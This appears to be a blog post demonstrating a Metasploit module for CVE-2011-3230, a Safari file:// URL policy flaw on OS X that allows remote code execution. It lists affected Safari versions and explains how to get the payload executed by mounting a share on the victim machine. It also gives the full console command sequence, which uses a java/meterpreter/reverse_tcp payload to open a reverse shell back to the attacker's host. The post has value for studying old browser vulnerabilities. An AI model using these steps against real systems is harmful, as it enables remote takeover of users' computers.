Vulnerability discovered and reported to vendor by Aaron Sigel
Coordinated release of the vulnerability the 2011-10-12
Metasploit PoC provided the 2011-10-16
PoC provided by :
Affected version(s) :
Safari 5.1 for Mac OS X v10.6.8
Safari 5.1 for Mac OS X Server v10.6.8
Safari 5.1 for OS X Lion v10.7.2
Safari 5.1 for OS X Lion Server v10.7.2
Tested on Mac OS X 10.7.1 with :
Safari 5.1 (7524.48.3) and Java SE Runtime Environment (build 1.6.0_26-b03-383-11A511)
This module exploits a vulnerability found in Apple Safari on OSX platform. A policy issue in the handling of file:// URLs may allow arbitrary remote code execution under the context of the user. In order to trigger arbitrary remote code execution, the best way seems to be opening a share on the victim machine first (this can be SMB/WebDav/FTP, or a fileformat that OSX might automount), and then execute it in /Volumes/[share]. If there’s some kind of bug that leaks the victim machine’s current username, then it’s also possible to execute the payload in /Users/[username]/Downloads/, or else bruteforce your way to getting that information. Please note that non-java payloads (*.sh extension) might get launched by Xcode instead of executing it, in that case please try the Java ones instead.
use exploit/osx/browser/safari_file_policy set SRVHOST 192.168.178.21 set URIPATH /readme.html set TARGET 1 set PAYLOAD java/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit getuid sysinfo
1 thought on “CVE-2011-3230 Apple Safari file:// Arbitrary Code Execution Metasploit Demo”
please upload Safari 5.1 for snow leo 10.6.8
Comments are closed.